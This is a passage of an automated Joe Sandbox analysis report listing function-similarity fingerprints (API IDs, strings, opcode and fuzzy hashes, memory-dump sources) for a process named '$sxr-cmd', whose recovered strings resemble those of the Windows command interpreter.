                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                            • String ID: %WINDOWS_COPYRIGHT%
                                                                                                            • API String ID: 1103618819-1745581171
                                                                                                            • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                            • Instruction ID: 0122c8c6bd9141f6156d1d1f92db3c3495ec74b4b692b6cf7c51735e2ee553f1
                                                                                                            • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                            • Instruction Fuzzy Hash: CA419462A08B8186EB91AF119410279F7E0FB49BA4FC54231DE8D27395EF3DE459C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$_wcslwr
                                                                                                            • String ID: [%s]
                                                                                                            • API String ID: 886762496-302437576
                                                                                                            • Opcode ID: 6b4c1c4d74b94ba716d9676fa8f70ee5e6fe565704e602bb4556ef7a03b977ca
                                                                                                            • Instruction ID: 974a6a56f2961e7984d52fe2950eff34a7eb49f80dcbe665052186d52ccceee6
                                                                                                            • Opcode Fuzzy Hash: 6b4c1c4d74b94ba716d9676fa8f70ee5e6fe565704e602bb4556ef7a03b977ca
                                                                                                            • Instruction Fuzzy Hash: EF319F32705B8289EBA1EF21D8903E9A7A0FB88B98F844135CE4D5B754DF3CD259C320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3355953691.000002155A580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002155A580000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a580000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                            • String ID: csm$f
                                                                                                            • API String ID: 3242871069-629598281
                                                                                                            • Opcode ID: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                            • Instruction ID: 957e55b3236b31630e8495eedf17e6a93393b39c7a8b9c6551fc86e0b3620aef
                                                                                                            • Opcode Fuzzy Hash: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                            • Instruction Fuzzy Hash: 43318031201A61EAEB149F12E848F993B56F7A4BDCFA58054FE560B784CB38C948CB04
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: iswspace
                                                                                                            • String ID: off
                                                                                                            • API String ID: 2389812497-733764931
                                                                                                            • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                            • Instruction ID: 9178024a2cbd92f882dc6ced911bb2784ef0ddf2921bcaa6a582e6adf4693300
                                                                                                            • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                            • Instruction Fuzzy Hash: 78217C21E0CE5285FBE0BB159490279E6A8FF4DBA0F9C9034D96E67680DE2CE44C9221
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                            • String ID: %s=%s$DPATH$PATH
                                                                                                            • API String ID: 3731854180-3148396303
                                                                                                            • Opcode ID: 6e24d6ef11c6ecd66e01cca1666d6bf90257a2046feb6b4e08ff6718ab6fb53b
                                                                                                            • Instruction ID: a8c44cd6fb39bae69f94e9968c5475da500f4e7581f6eb4dd9ee3f1ec70fae2e
                                                                                                            • Opcode Fuzzy Hash: 6e24d6ef11c6ecd66e01cca1666d6bf90257a2046feb6b4e08ff6718ab6fb53b
                                                                                                            • Instruction Fuzzy Hash: 9F21C511B09E4384FFD0AB65E440276E3A4AF84BA0FC95135DD0D673A4DE2ED45C8770
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcscmp
                                                                                                            • String ID: *.*$????????.???
                                                                                                            • API String ID: 3392835482-3870530610
                                                                                                            • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                            • Instruction ID: 9a679a507d20ce90fdcd79402019ad602badf2a34313ce6c9e4a2cf40b9b5d13
                                                                                                            • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                            • Instruction Fuzzy Hash: 53112525B24E6280E7E4AF26F480139B7A4FB48BA0F984030CE8D63B45DF3DF4498720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: fprintf
                                                                                                            • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                            • API String ID: 383729395-2781220306
                                                                                                            • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                            • Instruction ID: b6ac8d7fb373e3bcb48a5d2f2f8caceaaf43ecf718665187af7500dd4d7b78de
                                                                                                            • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                            • Instruction Fuzzy Hash: AA119421A09D4285EBD5AB14E5400B9A2A1FB447B0FC44331D97D672E4EF2DE469C370
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: iswspacewcschr
                                                                                                            • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                                            • API String ID: 287713880-1183017076
                                                                                                            • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                            • Instruction ID: 21fadd518960526ff4cb7d24dd7f2fa4e39c3f8e3306b28204e7b8a7024690cb
                                                                                                            • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                            • Instruction Fuzzy Hash: DDF04F21A18E5285EBA1AB11A4C017AE6A4FF4CF60BC99231D96E63354EF2DE45CC620
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                            • API String ID: 1646373207-2530943252
                                                                                                            • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                            • Instruction ID: 9bafe2cf8cd413594afe56ee5e10bf6362beb9f485456d2c2aae9720be5ad9d1
                                                                                                            • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                            • Instruction Fuzzy Hash: E1011E61E09E02D9EBD5AB14A891538E2A4FF49730FD50735C53E227E0DE7D656C8730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                            • API String ID: 1646373207-919018592
                                                                                                            • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                            • Instruction ID: 9eeae631cf3cdc8019f0bd82827617a5809f444d6c120b500581f94547ff4a79
                                                                                                            • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                            • Instruction Fuzzy Hash: 1CF03022618F81D6EB406B12F444079FB60FF89BE0B889534D94D17B14CF7DD469C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$CurrentDirectorytowupper
                                                                                                            • String ID:
                                                                                                            • API String ID: 1403193329-0
                                                                                                            • Opcode ID: 6d7e22519ad204417169069617a608dea1faeb656b6d76c54eaa8f80ef489a44
                                                                                                            • Instruction ID: 81ecaa1c538bd717ef4efebe26dd5ce2f8aba8580d1bcb8b134750aa784f8b6f
                                                                                                            • Opcode Fuzzy Hash: 6d7e22519ad204417169069617a608dea1faeb656b6d76c54eaa8f80ef489a44
                                                                                                            • Instruction Fuzzy Hash: 2A619332A08B828AF790EB65E4802EDB7A4FB48768F944235DE5D27799DF38D45CC710
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsnicmp$wcschr
                                                                                                            • String ID:
                                                                                                            • API String ID: 3270668897-0
                                                                                                            • Opcode ID: 14e2e029e2db4ad023fe39f4d0fdd58a578bfaa93e237b04781a15a7424acf6c
                                                                                                            • Instruction ID: fdcae01c8e128d661820ee323d9e64998542845afccb571e0377de5adf9378af
                                                                                                            • Opcode Fuzzy Hash: 14e2e029e2db4ad023fe39f4d0fdd58a578bfaa93e237b04781a15a7424acf6c
                                                                                                            • Instruction Fuzzy Hash: 8C518215A0CE4281FBA0BF15A4401B9A2A5FF49FA0FD88531C96E37AD5DE2CD54D8370
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$DriveFullNamePathType
                                                                                                            • String ID:
                                                                                                            • API String ID: 3442494845-0
                                                                                                            • Opcode ID: 0baa5ef54deadc9fcc920d5a13933ba0048a94416471efdfea7fe696d0336e1b
                                                                                                            • Instruction ID: 6bf6a2c46658116bcdf8625624e78c16eb2cfc40f427ded4cbb5ecbacc8580a3
                                                                                                            • Opcode Fuzzy Hash: 0baa5ef54deadc9fcc920d5a13933ba0048a94416471efdfea7fe696d0336e1b
                                                                                                            • Instruction Fuzzy Hash: 3D316D32619F828AEBA0EF11E8407E9B7A4FB88B94F844135DA4D57B54CF38D649C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                            • String ID:
                                                                                                            • API String ID: 140117192-0
                                                                                                            • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                            • Instruction ID: 271991f70b5ae7f8b735450bf3d01a96cb6566e1bbffd7de1f0979f9ec99afc8
                                                                                                            • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                            • Instruction Fuzzy Hash: 6641B435A08F4289EB90AF18F880375E7A4FB88764F900136D99D52764EF7EE56CC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcstol$lstrcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 3515581199-0
                                                                                                            • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                            • Instruction ID: f77109e7b7990efcb0ab0b845aed7f6a156466b809214244d8c1a46fae780fa2
                                                                                                            • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                            • Instruction Fuzzy Hash: 8E21C132A08E5293E7A06F69A0D413AEEA8FB4D760F855134DB6F53A54CE6DE44CC620
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File_get_osfhandle$TimeWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 4019809305-0
                                                                                                            • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                            • Instruction ID: 86ccff35940b25d2e61221e022b8a3f53ed0764196ae8a260aebeb0e5d7d24da
                                                                                                            • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                            • Instruction Fuzzy Hash: 96318122A08B4287E7E06B149480738E691BF49B70FD45238D95E67795CF7DD46C8630
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
